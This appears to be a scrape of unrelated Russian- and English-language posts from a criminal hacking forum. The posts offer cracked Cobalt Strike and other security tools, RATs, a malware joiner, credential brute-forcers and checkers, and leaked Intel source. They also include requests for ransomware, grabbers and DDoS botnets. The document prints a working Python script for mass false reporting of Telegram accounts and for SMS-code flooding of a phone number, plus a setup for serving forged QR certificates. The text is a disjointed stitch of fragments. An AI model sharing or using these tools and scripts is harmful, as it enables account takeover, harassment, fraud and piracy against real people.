С настройкой закончили. При первом запуске файла main необходимо пройти
авторизацию.
После перезапуска бот будет мониторить каналы на наличие новых постов. При
появлении сообщений в канале-доноре бот отправит сообщение в Технический канал
для выбора канала для публикации поста. Если в течение 60 минут (можно
изменить время в 39 строке файла main) ответа нет, бот автоматически отправит
сообщение во все группы.
Пользуйтесь на здоровье!
You must have at least 10 reaction(s) to view the content.
You can download Elcomsoft forensic tools from this link. I have a gift for those who do not have it I can continue to share paid applications according to the reaction.
Предлагаю в этой теме выкладывать ссылки на полезные скрипты для Cobalt Strike.
AVQuery.cna
URL: https://github.com/harleyQu1nn/AggressorScripts/
CertUtilWebDelivery.cna
URL: https://github.com/harleyQu1nn/AggressorScripts
Beacon_Initial_Tasks.cna
URL: https://github.com/mgeeky/cobalt-arsenal
FilesColor.cna
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Fe75b5d814e624a4a385bc92a0ffe4d3fc619fe0775bcaacad928b5be270e0849%2Fsense- of-security%2FADRecon&hash=d9184fbe7d68bd5f235ec4e40bad14cf&return_error=1)
information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment. ](https://github.com/sense-of-security/ADRecon)
ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment. - GitHub - sen...
github.com
Может кто поделиться сорцами Андройд лоудера слитыми в паблик, заранее спасибо!
Приветствую всех!
Эта тема посвящена автоматизации любых задач в ADS Power. Если вы хотите
освоить инструменты автоматизации, научиться экономить время, избегать
типичных ошибок и монетизировать свои навыки — добро пожаловать!
Что вы найдете в этой теме?
Цель темы — создать пространство, где вы сможете развиваться, получать полезные инструменты и делиться своими успехами!
Welcome everyone!
This thread is dedicated to automating any tasks in ADS Power. If you want
to master automation tools, save time, avoid common mistakes, and monetize
your skills — you’ve come to the right place!
What will you find in this thread?
The goal of this thread is to create a space where you can grow, gain valuable tools, and share your achievements!
Какие задачи можно автоматизировать?
What tasks can be automated?
Spoiler: Мануалы по настройке и решение проблем
Гайд по настройке обхода капчи в
RPA
Python-скрипт для массового создания профилей с использованием списка IP из
файла
Spoiler: Setup manuals and problem solving
Guide to Setting Up CAPTCHA Bypass in
RPA
Python script for mass profile creation using an IP list from a
file
Spoiler: Бесплатные RPA шаблоны для ADS Power
Шаблон для нагуливания Cookies и *скликивания конкурентов в Google Ads
Spoiler: Free RPA templates for ADS Power
Template for Farming Cookies and *Clicking Competitors in Google Ads
Планирую
регулярно обновлять эту тему, делиться новыми наработками и рассказывать о
тонкостях работы в ADS Power. Буду рад обратной связи и вашим предложениям.
I plan to update this topic regularly, share new developments and talk
about the subtleties of working in ADS Power. I will be glad to
receive feedback and your suggestions.
SmartBear ReadyAPI Pro полностью активирован
(SoapUI NG Pro + LoadUI NG Pro + ServiceV Pro)
Повышение качества API за счет тестирования
Платформа ReadyAPI ускоряет функциональное тестирование, тестирование
безопасности и нагрузочное тестирование RESTful, SOAP, GraphQL и других веб-
сервисов прямо внутри вашего конвейера CI / CD.
Обеспечьте непрерывное качество всех ваших веб-сервисов.
Три инструмента. Одна платформа. Поодиночке они сильны, но вместе еще лучше.
ReadyAPI позволяет командам создавать, управлять и выполнять автоматизированные функциональные тесты, тесты безопасности и производительности в едином централизованном интерфейсе, повышая качество API для групп программного обеспечения Agile и DevOps. Команды могут начать работу с импорта определений API, таких как OAS (Swagger) или WSDL, тестирования и записи трафика API в реальном времени или виртуализации веб-сервисов для удаления зависимостей конвейера.
Гибкие варианты автоматизации для интеграции тестирования API в конвейеры CI / CD во время каждой сборки
Независимо от того, используете ли вы статические серверы сборки или динамические облачные платформы, ReadyAPI предлагает исчерпывающий набор интеграций в автоматизированные среды любого типа.
Три модуля | Единая платформа | Гибкие возможности
Функциональное тестирование и тестирование безопасности
Создавайте комплексные сквозные тесты, которые проверяют весь рабочий процесс ваших API на основе определения API или живых конечных точек.
Тестирование производительности
Перед выпуском в производство проверьте скорость, масштабируемость и производительность ваших API-интерфейсов, серверов и сетевых ресурсов.
API и виртуализация сервисов
Виртуализируйте критически важные API-интерфейсы и микросервисы, чтобы уменьшить зависимости и задержки в конвейере доставки.
Лицензия на программное обеспечение: Professional Edition (все модули)
Версия: 3.6.0
Цена: $ 9000
Скидка: 100% OFF
NG Pro + LoadUI NG Pro + ServiceV Pro ) - WwW.Dr- FarFar.CoM.zip****
сабж, осталось у кого ? https://redplait.blogspot.com/search/label/wincheck
Привет народ!
Пожалуйста помогите!
сам добываю скл уязвимости, а слить нечем!
Нужен софт панель под слив дампов с скл уязвимости(МАССОВО)!
p.s. платные версии мтешки сибки(и нет денег на шелы) не предлагайте просто
нет денег! врапер плохо воркает!
https://www.ostorlab.co/scan/mobile
](https://vulnerabilitytest.quixxi.com/)
The free vulnerability test from Quixxi provides you a comprehensive report about the open vulnerabilities in your mobile apps. Quixxi is a security frame work designed to protect your app.
vulnerabilitytest.quixxi.com
Сколько можно заработать на создании фишинговых сайтов?
Use the license key provided inside the folder for activation.
Don't use without sufficient RAM. (It eats a lot of RAM)
This giveaway is basically to tell you and make you realize how people pay so
much for stuffs and get disappointed ?
This RAT on the official website is around 95$
Size: 170.6 MB
Download and test it on a VM
Save it to your malware collection:
anonfiles . com/Ddie4c99u5/Octupus_Rat_Main_zip
X-Ways Forensics is an advanced work environment for computer forensic
examiners and our flagship product. Runs under Windows
XP/2003/Vista/2008/7/8/8.1/2012/10/2016*, 32 Bit/64 Bit,
standard/[PE](https://articles.forensicfocus.com/2017/01/06/windows-10-pe-for-
digital-forensics/)/FE. (Windows FE is described
here,
here and
here.) Compared to its
competitors, X-Ways Forensics is more efficient to use after a while, by far
not as resource-hungry, often runs [much
faster](https://binaryforay.blogspot.hk/2016/09/let-benchmarks-hit-floor-
autopsy-vs.html), finds deleted files and search hits that the competitors
will miss, offers many features that the others lack, as a German product is
potentially more
trustworthy, comes
at a fraction of the cost, does not have any ridiculous hardware requirements,
does not depend on setting up a complex database, etc.! X-Ways Forensics is
fully portable and runs off a USB stick on any given Windows system without
installation if you want. Downloads and installs within seconds (just a few MB
in size, not GB). X-Ways Forensics is based on the WinHex hex and disk
editor and part of an efficient
workflow
model
where computer forensic examiners share data and collaborate with
investigators that use X-Ways
Investigator
Download :
https://anonfiles.com/vdWbU872qf/X-Ways_Forensics_20.1_SR7_rar
https://www.upload.ee/files/12952472/X-Ways_Forensics_20.1_SR7.rar.html
PASS : xss.is
Hi,
Latest version of Acunetix build v14.4.210913167
Acunetix Web Vulnerability Scanner (AWVS for short) is a well-known Web network vulnerability scanning tool. It uses web crawlers to test your website security and detect popular security vulnerabilities.
Click to expand...
Download:
Hidden content for authorized users.
https://anonfiles.com/7fgfS7I3u9/Acunetix_Premium_v14.4.210913167_7z
Pass: Acunetix.r1z.XSS
Contains:
• ElcomSoft Advanced Archive Password Recovery 4.54.110
• ElcomSoft Advanced EFS Data Recovery Pro 4.50.51.1795
• ElcomSoft Advanced IM Password Recovery 4.90.1805
• ElcomSoft Advanced Intuit Password Recovery 2.0
• ElcomSoft Advanced Lotus Password Recovery 2.11
• ElcomSoft Advanced Mailbox Password Recovery 1.11.476
• ElcomSoft Advanced Office Password Breaker Enterprise Edition 3.06.803
• ElcomSoft Advanced Office Password Recovery Pro 6.34.1889
• ElcomSoft Advanced PDF Password Recovery Enterprise 5.08.145
• ElcomSoft Advanced Sage Password Recovery 2.30.383
• ElcomSoft Advanced SQL Password Recovery 1.14.2138
• ElcomSoft Advanced VBA Password Recovery 1.63
• ElcomSoft Advanced WordPerfect Office Password Recovery 1.35
• ElcomSoft Cloud eXplorer ECX Forensic 2.20.33820
• ElcomSoft Dictionaries 1.0.1110
• ElcomSoft Distributed Password Recovery 4.10.1245.4902
• ElcomSoft Explorer for WhatsApp 2.71.32041
• ElcomSoft Forensic Disk Decryptor Common 2.10.567
• ElcomSoft Internet Password Breaker 3.10.4887
• ElcomSoft iOS Forensic Toolkit 5.0
• ElcomSoft Lightning Hash Cracker 0.60
• ElcomSoft Password Digger Standard 1.04.147
• ElcomSoft Phone Breaker 8.30
• ElcomSoft Phone Breaker Forensic 9.20.34624
• ElcomSoft Phone Password Breaker Professional 3.00.106
• ElcomSoft Phone Viewer Forensic 4.60.34324
• ElcomSoft Proactive Password Auditor 2.07.61
• ElcomSoft Proactive System Password Recovery 6.60.568
• ElcomSoft System Recovery 6.0.402 BootISO
• ElcomSoft Wireless Security Auditor Pro 7.12.538
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/BJkgHQgC#Z74mTlyv1xtjq2DOU-Q6oTrrkja65S2aNG-YJur-kl8)
mega.nz
Intel ME Bringup guides + (flash) tooling + samples for various platforms
Kabylake (Purley Platform) BIOS Reference Code and Sample Code +
Initialization code (some of it as exported git repos with full history)
Intel CEFDK (Consumer Electronics Firmware Development Kit (Bootloader stuff))
SOURCES
Silicon / FSP source code packages for various platforms
Various Intel Development and Debugging Tools
Simics Simulation for Rocket Lake S and potentially other platforms
Various roadmaps and other documents
Binaries for Camera drivers Intel made for SpaceX
Schematics, Docs, Tools + Firmware for the unreleased Tiger Lake platform
(very horrible) Kabylake FDK training videos
Intel Trace Hub + decoder files for various Intel ME versions
Elkhart Lake Silicon Reference and Platform Sample Code
Some Verilog stuff for various Xeon Platforms, unsure what it is exactly
Debug BIOS/TXE builds for various Platforms
Bootguard SDK (encrypted zip)
Intel Snowridge / Snowfish Process Simulator ADK
Various schematics
Intel Marketing Material Templates (InDesign)
Torrent/magnet
torrent:
magnet:?xt=urn:btih:38f947ceadf06e6d3ffc2b37b807d7ef80b57f21&dn=Intel%20exconfidential%20Lake%20drop%201
Ищу Form&File Grabber
Желательно, чтобы не всё что можно тащил, а с указанием определенных тегов
Что из актуального есть на рынке?
Hello Everyone
**First
[LIKES = 1] https://mega.nz/folder/UkIyFSgZ#6E0fz-r0gfkUYwtsRsIZvw [/ LIKES]
**
Second
[LIKES = 1] https://mega.nz/folder/rKpA1AZb#IFYtYw_B1rv_PvEmMRquuw [/ LIKES]
Third
[LIKES = 1] https://mega.nz/folder/SvojiB5Q#TFNLypoj0q0cwmRuggDlyg [/ LIKES]
Fourth
[LIKES = 1] <https://mega.nz/folder/KagDUCZA#hkK1TU-
QSYAu1rg0AZAKDQ/folder/rfJV3YZI> [/ LIKES]
Дарова форумчане
Нашел этот софт в каком то тг канале неделю назад, чекал WORK
Решил его зашерить для всех, может кому то полезно будет
Python:Copy to clipboard
import requests
import random
import string
import time
import fake_useragent
def get_complaint_data(choice):
message = None
if choice == '1':
username = input("@username: ")
id = input("Telegram ID: ")
chat_link = input("Ссылка на чат: ")
violation_link = input("Ссылка на нарушение: ")
message = f"Здравствуйте, уважаемая поддержка. На вашей платформе я нашел пользователя который отправляет много ненужных сообщений - СПАМ. Его юзернейм - {username}, его айди - {id}, ссылка на чат - {chat_link}, ссылка на нарушения - {violation_link}. Пожалуйста примите меры по отношению к данному пользователю."
elif choice == '2':
username = input("@username: ")
id = input("Telegram ID: ")
chat_link = input("Ссылка на чат: ")
violation_link = input("Ссылка на нарушение: ")
message = f"Здравствуйте, уважаемая поддержка, на вашей платформе я нашел пользователя, который распространяет чужие данные без их согласия. его юзернейм - {username}, его айди - {id}, ссылка на чат - {chat_link}, ссылка на нарушение/нарушения - {violation_link}. Пожалуйста примите меры по отношению к данному пользователю путем блокировки его акккаунта."
elif choice == '3':
username = input("@username: ")
id = input("Telegram ID: ")
chat_link = input("Ссылка на чат: ")
violation_link = input("Ссылка на нарушение: ")
message = f"Здравствуйте, уважаемая поддержка телеграм. Я нашел пользователя который открыто выражается нецензурной лексикой и спамит в чатах. его юзернейм - {username}, его айди - {id}, ссылка на чат - {chat_link}, ссылка на нарушение/нарушения - {violation_link}. Пожалуйста примите меры по отношению к данному пользователю путем блокировки его акккаунта."
elif choice == '4':
username = input("@username: ")
id = input("Telegram ID: ")
chat_link = input("Ссылка на чат: ")
violation_link = input("Ссылка на нарушение: ")
message = f"Здравствуйте, уважаемая поддержка. Я случайно перешел по фишинговой ссылке и утерял доступ к своему аккаунту. Его юзернейм - {username}, его айди - {id}. Пожалуйста удалите аккаунт или обнулите сессии"
elif choice == '5':
username = input("@username: ")
id = input("Telegram ID: ")
message = f"Добрый день поддержка Telegram!Аккаунт {username} , {id} использует виртуальный номер купленный на сайте по активации номеров. Отношения к номеру он не имеет, номер никак к нему не относиться.Прошу разберитесь с этим. Заранее спасибо!"
elif choice == '6':
username = input("@username: ")
id = input("Telegram ID: ")
message = f"Добрый день поддержка Telegram! Аккаунт {username} {id} приобрёл премиум в вашем мессенджере чтобы рассылать спам-сообщения и обходить ограничения Telegram.Прошу проверить данную жалобу и принять меры!"
elif choice == "7":
user = fake_useragent.UserAgent().random
headers = {'user_agent' : user}
number = int(input('Введите номер телефона: '))
count = 0
while True:
response = requests.post('https://my.telegram.org/auth/send_password', headers=headers, data={'phone' : number})
response1 = requests.get('https://telegram.org/support?setln=ru', headers=headers)
response2 = requests.post('https://my.telegram.org/auth/', headers=headers, data={'phone' : number})
response3 = requests.post('https://my.telegram.org/auth/send_password', headers=headers, data={'phone' : number})
response4 = requests.get('https://telegram.org/support?setln=ru', headers=headers)
response5 = requests.post('https://my.telegram.org/auth/', headers=headers, data={'phone' : number})
response6 = requests.post('https://discord.com/api/v9/auth/register/phone',headers=headers, data={"phone": number})
count += 1
print("Атака началась", {count})
else:
print("Неверный способ отправки жалобы")
main()
return message
def send_complaint(message, number):
while True:
url = "https://telegram.org/support"
random_string = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))
email = f"{random_string}@gmail.com"
random_digits = ''.join(random.choice(string.digits) for _ in range(9))
phone = f"+79{random_digits}"
data = {
'message': message,
'email': email,
'phone': phone,
'setln': ""
}
response = requests.post(url, data=data)
if response.status_code == 200:
print(f"Запрос {message} успешно отправлен от {phone} {email}! #{number}")
else:
print("Ошибка при отправке запроса.")
print("Код ошибки:", response.status_code)
def main():
sent_emails = 0
while True:
print("1. Спам")
print("2. Личные данные")
print("3. Троллинг")
print("4. Снос сессий")
print("5. Виртуальный номер")
print("6. Премиум")
print("7. Флуд кодами")
choice = input("Выберите способ: ")
message = get_complaint_data(choice)
send_complaint(message, sent_emails + 1)
sent_emails += 1
time.sleep(0.5)
if __name__ == "__main__":
main()
![](/proxy.php?image=https%3A%2F%2Fportswigger.net%2Fburp%2Fpro%2Ffeatures%2Fimages%2Fpro- features-hero.png&hash=6698de0d41771e2465ecabc50b24d4df)
is a coordinated stage for performing security testing of web applications. Its different devices work flawlessly together to help the whole testing procedure, from introductory mapping and examination of an application's assault surface, through to finding and abusing security vulnerabilities.
Burp gives you full control, giving you a chance to consolidate propelled manual methods with best in class mechanization, to make your work quicker, progressively powerful, and increasingly fun.
In this release, we've greatly improved the usability of Burp Suite by removing the need to perform many of the initial configuration steps for Burp Proxy.
Link:
Hidden content for authorized users.
https://www.upload-4ever.com/of3rrjybmao4
Hidden content for authorized users.
[/ HIDE] [/ HIDE]
Password:
Hidden content for authorized users.
Dr.FarFar
Йо, думаю тут ошивается много системных администраторов перед которыми
предстает вопрос как можно автоматизировать резервное копирование документации
или других файлов компании. Безуслдовно самый лучший софт это тот софт который
ты напишешь сам. Но если ты ленивый или тебе есть чем заняться кроме работы
это решение для тебя
Ссылка на скачивание:
https://mega.nz/folder/VOhXFCzD#_KxEkX6gh2N-41Puy6X75A
Было бы гуд если в коментах еще что-нибудь пооветовали из софта который
облегчает жизнь
С.А.
Программа предназначена для склеивания файлов в один.
С помощью нее можно маскировать зверька под картинку или, например, текстовый
документ.
Джойнер ФУД и детект файла зависит только от содержимого.
Построен на базе легитимного ПО, а именно 7z архиватора.
Умеет работать с Version Info и и имеет гибкое редактирование конфигурации
билда перед склеиванием.
Иконки в наборе с софтом так же присутствуют.
Еще из плюсов могу отметить то что после склейки файл имеет малый вес, так как
сжатие и распаковка происходит непосредственно в момент запуска.
Скачать: https://anonfiles.com/J0P4nbA1y1/Joiner7z_zip (нет пароля)
Взято с Языка Хакера -https://zxc.qa
English Here === Русский ниже
Cobalt Strike 4.4
Cracked and Packed by #GhostSec
Link: https://anonfiles.com/v7Ha1aF1uf/CobaltStrike4.4_GhostSec_7z
Packed with 3rd party toolkits as well
What is cobalt strike?
Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers.
Providing features from Recon to post exploitation and much more
Happy Hacking!!
=======Russian Below==========
Cobalt Strike 4.4
Взломанная и упакованная #GhostSec
Ссылка: https://anonfiles.com/h6taz0F4ud/cobaltstrike4.4_zip
Что такое Cobalt Strike?
Cobalt Strike - это программное обеспечение для эмуляции угроз. Выполняйте целевые атаки на современные предприятия с помощью одного из самых мощных комплектов сетевых атак, доступных для тестеров проникновения.
Предоставление функций от Recon до пост-эксплуатации и многое другое.
Code:Copy to clipboard
clone repo
cd repo
uvicorn qr:app --host=127.0.0.1 --port 8000 --proxy-headers
Code:Copy to clipboard
далее вручную крафтим ссылку вида
http[s]://sitename/qr/{параметры вашего qr-кода}
строка параметров имеет строгий формат: ФdИdОdDDMMYYYYddmmyyyy где буквы Ф,И,О - первая буква фамилии, имени, отчества d после каждой буквы - количество звездочек в маске которые скрывают остальные буквы имени (т.е. длина имени-1)
например Харитонова Ульяна Йорковна => Х9У5Й7 отобразится как:
Х********* У***** Й*******
дальше DDMMYYYY - дата рождения
а ddmmyyyy - срок действия
Для нашей Ульяны родившейся в день рожения UNIX-а строка параметров получит следующий вид: Х9У5Й70101197031122021
И значит итоговая ссылка примет следующий вид:
https://sitename/qr/Х9У5Й70101197031122021 Вбиваем ссылку в браузер и получаем нужный нам результат
Code:Copy to clipboard
Осталось сгенерировать QR-код из полученной ссылки
Я для этого использую утилиту qrencode:
qrencode -o myqr.png -t png32 'https://sitename/qr/Х9У5Й70101197031122021'
Code:Copy to clipboard
nginx
Естественно толку от QR-кода никакого если закодированная им ссылка будет вести на локалхост. Поэтому сайт конечно стоит спрятать за nginx
Рабочий конфиг для nginx с SSL от LetsEncrypt /etc/nginx.sites-enabled/qr.conf
NGINX:Copy to clipboard
server {
server_name YOURSERVERNAME;
location / {
proxy_pass http://127.0.0.1:8000;
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_redirect off;
proxy_buffering off;
}
listen 443 ssl; # managed by Certbot
ssl_certificate /etc/letsencrypt/live/your.server.name/fullchain.pem; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/your.server.name/privkey.pem; # managed by Certbot
include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
}
server {
if ($host = mosru.iddqd.cloudns.cl) {
return 301 https://$host$request_uri;
} # managed by Certbot
server_name YOURSERVERNAME;
listen 80;
return 404; # managed by Certbot
}
Contribute to maximlarionov/goskulugi development by creating an account on GitHub.
github.com
Добрый вечер, попал в небольшой ступор, не могу зайти в openvas с другого компьютера. На впске установил openvas, но ради удобства хочу работать с браузера на домашней тачке, зашел в настройки /etc/default/greenbone-security- assistant поменял там ip localhost на внешний ip моей впс, (также менял на 0.0.0.0) сохранил, перезапустил сервисы( /etc/init.d/greenbone-security- assistant restart) Захожу через браузер с другого компьютера по адресу впски с соответствующим портом, но получаю сообщение, что якобы сервис лежит, хотя все работает. В чем может быть проблема? Может нужно для этой тузлы сертификат клиента сделать?Или я что то не то делаю?
Apple account or Apple account checker with security issues
Hello Guys if you like give me like
[LIKES = 1] https://mega.nz/folder/fawFQQRT#Z2O9pgqCyeUUwQ4e1YPi5g [/ LIKES]
A good tool to take a screenshot of a web site: https://github.com/sensepost/gowitness
Можно крутить до 100К в день.
You must have at least 300 reaction(s) to view the content.
Распространённые ошибки:
Цель - собрать все внутренние ссылки на крупном сайте с несколькими миллионами страниц, чтобы потом уже отобрать нужное и скачать. Пробовал Xenu Link Sleuth, но он жрет память и совершает слишком много ненужных операций... И в итоге просто зависает намертво.
Есть ли какой-то аналог нормальный?
подскажите где достать чекер номеров на налтчие телеграмм?
You must have at least 10 message(s) to view the content.
BruteForce for Microsoft Exchange Service ALL Version.
Source Code is avalibe.
Download :
You must have at least 5 reaction(s) to view the content.
pass : xss.is
Всем привет, я новичок в этом форуме, поэтому я хотел поделиться своим крком Netsparker (как обычно).
Ссылка на сайт: Netsparker
Пароль архива: h0nus-reign
Да, я использовал Google Translate, извините за грамматические ошибки :P
Журнал изменений: [Changelog](https://www.netsparker.com/web-vulnerability- scanner/changelog/)
Ищу решение или совет как обрабатывать более менее автоматизировано большое количество доступов на подобии (admin,wp- admin,hosting,whm.,administrator,manager,wp- login,cpanel,WebMin,/pma,controlpanel,/adm,ccms/index.php,yonetici,rcLogin/,/db,/mysql,/xlogin,:2087)
Задача заключается в том что бы отобрать из всей массы доступы в которых есть
платежный инструмент (задача отбросить сайты визитки и все что связанно с
ними)
В идеале сделать так что бы заходить в админку и сколько ордеров чекаеть
](https://github.com/quentinhardy/odat)
ODAT: Oracle Database Attacking Tool. Contribute to quentinhardy/odat development by creating an account on GitHub.
github.com
Всем привет.
Если кто искал Nessus pro **8.15.2 то взять можно тут:
[ https://beta.hide01.ir/nessus-professional/ ](https://beta.hide01.ir/nessus- professional/)
**
For those who would like to get a free bug fixed version of CS 4.3 from 17 march
You must have at least 50 reaction(s) to view the content.
Archive ](https://archive.org/details/gigaleak1)
Original files of the first SNES Gigaleak
archive.org
Archive ](https://archive.org/details/bbgames.7z)
The original bbgames.7z from the N64 GigaLeak 2
archive.org
![archive.org](/proxy.php?image=https%3A%2F%2Farchive.org%2Fservices%2Fimg%2Fnintendo- gigaleak-4chan-pdfs.-7z&hash=cc93354902775c53fd9854f3639efd4e&return_error=1)
: Internet Archive ](https://archive.org/details/nintendo-gigaleak-4chan- pdfs.-7z)
archive of the happenings
archive.org
Didn't See them here Hope you guys enjoy
**️Debank Checker V2**
Information:
• Парсинг Общего баланса (+ Pool Balance / + Token Balance)
• Многопоточность
• Поддержка Proxy (http / https / socks4/ socks5)
• Сортировка результатов по балансу (0, 0-1, 100-500, 500-1000, 1000+ $)
• Загрузка аккаунтов в любом удобном формате (скрипт алгоритмами ищет
mnemonic, private key, address в каждой строке)
• Авто-замена Proxy при ошибке
Donate (any EVM chain) - 0xDEADf12DE9A24b47Da0a43E1bA70B8972F5296F2
Donate (SOL) - 2Fw2wh1pN77ELg6sWnn5cZrTDCK5ibfnKymTuCXL8sPX
Donate (TRX) - TEAmkvFXJ6N6wzN4aS3HtgiM7XhnwRrtkW
Hidden content for authorized users.
Используйте только на виртуалке!
10 звезд
https://github.com/x1234xx/Venom-2.3-VNC-Rat
Ищу актуальный кряк для Elcomsoft Phone Breaker Forensic Edition, нужна свежая версия
Нашел на рутрекере - Elcomsoft Phone Breaker v9.65 Forensic Edition - но там не работает как раз та функция которая мне нужна, ее пофиксили в версии 9.70
Может у кого есть, был бы благодарен. Всех обнял.
AdLinkFly - СКРИПТ ДЛЯ МОНЕТЕЗАЦИИ КОРОТКИХ ССЫЛОК
Умеет сокращать ссылки и публиковать рекламу, а также включает в себя создание кампаний, партнерскую систему, API, актуальные платежные шлюзы, поддержку капчи и многое другое.
Hidden content for authorized users.
Внимание ищу софт
с помощью которого можно управлять айфоном
**используя исключительно USB соединение без Bluetooth и WI-FI
Разумеется Jailbreak на борту
ПИШИТЕ В ТГ ИЛИ ЛС (БЕЗ ШИФРОВАНИЯ !!!!) **
P.S AIRDROID НЕ ПРЕДЛАГАТЬ ! ОН ИСПОЛЬЗУЕТ BLUETOOTH В ПАРЕ С USB
Доброго времени, в поиске софта под облачные сервисы.
Disable OS detection, script scanning and traceroute options (do not use options -A nor -O)
Avoid, if possible, UDP scanning (option -U)
Slow scanning speed by using the -T option: -T2
If you are doing port scanning, --scan-delay might be useful: --scan-delay 1075ms
Cobalt Strike 4.5 original:
sha256:
cobaltstrike.jar
a5e980aac32d9c7af1d2326008537c66d55d7d9ccf777eb732b2a31f4f7ee523
download:
https://www.yunzhongzhuan.com/#sharefile=WMdQEZvv_49540
pass:www.ddosi.org
**Есть какие нибудь мощные, но бесплатные ботнеты и как при DDOS-Атаке сайта себя обезопасить?
Про: впн, виртуалки на кали, прокси я знаю, а есть какие либо еще способы не присесть за данные злодеяния?
Буду благодарен любой полезной информации.**
Hello mates
[LIKES = 2] https://anonfile.com/Tec4waj5ba/Steam_Checker_ENG_rar
anonfile.com
](https://anonfile.com/Qfk2Nds1b6/Steam_acc_generator_zip)
anonfile.com
](https://anonfile.com/689c21w1n0/Steam_by_matt_anom)
anonfile.com
](https://anonfile.com/C0baI9Sbma/config_steam_ini)
anonfile.com
](https://anonfile.com/cd7bG9q4ba/steam_bulk_activator_rar)
anonfile.com
](https://anonfile.com/07heHfa1n4/Steam_Checker_rar)
anonfile.com
](https://anonfile.com/8654hft3b4/Steam_Accounts_Checker_v0.4_By_X-SLAYER_rar)
anonfile.com
](https://anonfile.com/C2Ob89tdb1/_500k_steam_accounts_rar)
anonfile.com
](https://anonfile.com/FfQcN0l5b4/steam_brute_rar)
anonfile.com
](https://anonfile.com/Pfsei6y4n1/Steam_Key_Checker_Generator_exe)
anonfile.com
](https://anonfile.com/rdY7u4icb5/Steam_Wallet_Hack_2019_rar)
anonfile.com
](https://anonfile.com/h8u4FeE1n6/steam_checker_v_1.0_by_scorpio_rar)
anonfile.com
](https://anonfile.com/hdj9l1gdbe/Steam_Destroyer.pdf)
anonfile.com
](https://anonfile.com/Ccr2m0p8b6/Steam_Key_Generator_rar)
anonfile.com
Panel_rar)
anonfile.com
](https://anonfile.com/g4xbM6ydn8/Steam_Key_Checker_Generator_exe)
anonfile.com
](https://anonfile.com/Mbm3w5h8b5/TeamzPAZ_Steam_FAST_Checker_zip)
anonfile.com
](https://anonfile.com/222ar331nb/steam_machine_rar)
anonfile.com
](https://anonfile.com/m062k1vanc/Steam_Checker_rar)
anonfile.com
anonfile.com
](https://anonfile.com/47x0Zatdb7/Steam_Account_generator_FIX_zip)
anonfile.com
#985.908_[Hulu,Minecraft,Picmonkey,Netflix,Fortnite,Spotify,Deezer,Crunchyroll,Steam,Twitch] .zip - AnonFiles ](https://anonfile.com/g53bhcA3n8/_985.908_Hulu_Minecraft_Picmonkey_Netflix_Fortnite_Spotify_Deezer_Crunchyroll_Steam_Twitch_zip)
anonfile.com
](https://anonfile.com/Xbj194W3n6/Origin_and_Steam_Checker_by_Decode_0.1_rar)
anonfile.com
](https://anonfile.com/L8odcbS6n0/hack_steam_beta_vs2019_imgui_v21_rar)
anonfile.com
](https://anonfile.com/La3cH3Bbn8/steam_checkerv_1.0_by_scorpio_rar)
anonfile.com
](https://anonfile.com/C200Nah7b6/Origin-Steam_Checker_rar)
anonfile.com
](https://anonfile.com/Sf7a72h4n9/Steam_Wallet_Tricks_pdf)
anonfile.com
https://anonfile.com/Zf50taveb0/steam_keys_rar [/ LIKES]
Thanks
Any good public ransomware with panel?
I can spread it very good.
I tryed to contact with some Raas but they dont want work.
Sorry for my english.
jabber - seth@thesecure.biz
базы мих / приемущество азия
прокси http/s
https://www.virustotal.com/gui/file...16417be2b7e6fee8457dc12f10bb56dbd39/detection
VT на exe
[https://www.virustotal.com/gui/file...mVjMTViZGQ2N2M0Njc6MTYyOTMxNzY4MQ==/detection](https://www.virustotal.com/gui/file-
analysis/NGU4ZTgwNWVlZmJkZTAyZGJjMmVjMTViZGQ2N2M0Njc6MTYyOTMxNzY4MQ==/detection)
[ http://rutordeepkpafpudl22pbbhzm4llbgncunvgcc66kax55sc4mp4kxcid.onion/attachments/bit- copy-rar.38727/ ](http://rutordeepkpafpudl22pbbhzm4llbgncunvgcc66kax55sc4mp4kxcid.onion/attachments/bit- copy-rar.38727/)
Проект для брута paypal, работает через selenium.
https://anonfiles.com/F8g0Nb81ob/Paypal.com_loli
Лучше делать конфиги под Anomaly версию, там нет проблемы с Type он автоматом
выбирает нужный
когда закидываешь базу. И во всех конфигах стандартно стоит
Авто-постер контента из Telegram каналов на свой. Софт способен получать посты (фото,видео,файлы) в реальном времени из указанных вами каналов и публиковать полученный контент от имени канала на указанных вами каналах.
ФУНКЦИИ СКРИПТА:
Способен получать контент с любого канала.
Уникальный алгоритм фильтрации СТОП слов.
Улучшенная фильтрация для удаления или замены не нужных слов.
Возможность хранить или удалять спаренный контент на сервере.
Остановить мониторинг нужного канала.
Отключение работы менеджера.
Возможность публикации сообщений в формате фото альбомов (фото, видео).
Переработанный алгоритм фильтрации с легкостью отличает легитимный пост от
рекламного
Удобная фильтрация постов по содержимому inline кнопок.
Возможность добавление необходимого вам текста на все сообщения перед
постингом.
Добавление кнопок Like/DisLike для фото(лайки кнопки) через бот.
Не нужны медиа файлы ? Просто включи фильтр по наличию медиа в посте
источнике.
Пересылка файлов любых размеров с канала источника занимает минимум времени
В случае перезагрузки или падения сервера предусмотрен Авто-запуск скрипта
после включения.
Мульти-фильтр - Позволяет настраивать фильтрацию контента, а так же
реакции(лайки) отдельно для каждого канала.
Фильтр по ссылкам - Удаляет из поста указанные ссылки.
Запоминает ранее добавленные с текущего аккаунта каналы.
ПРЕИМУЩЕСТВА
Нет необходимости собирать контент для канала.
Не нужно тратить время на публикации.
Нет необходимости приобретать месячные подписки на сервисы, где рекламы больше
чем полезных постов.
Улучшенные методы фильтрации и распознавания рекламы.
Возможность настроить публикацию контента в соответствии с тематикой канала.
Удобство и простота в использовании - 1 раз настроил и забыл. Работает 24\7.
ИНСТРУКЦИЯ ПО УСТАНОВКЕ И НАСТРОЙКЕ ПРИЛАГАЕТСЯ
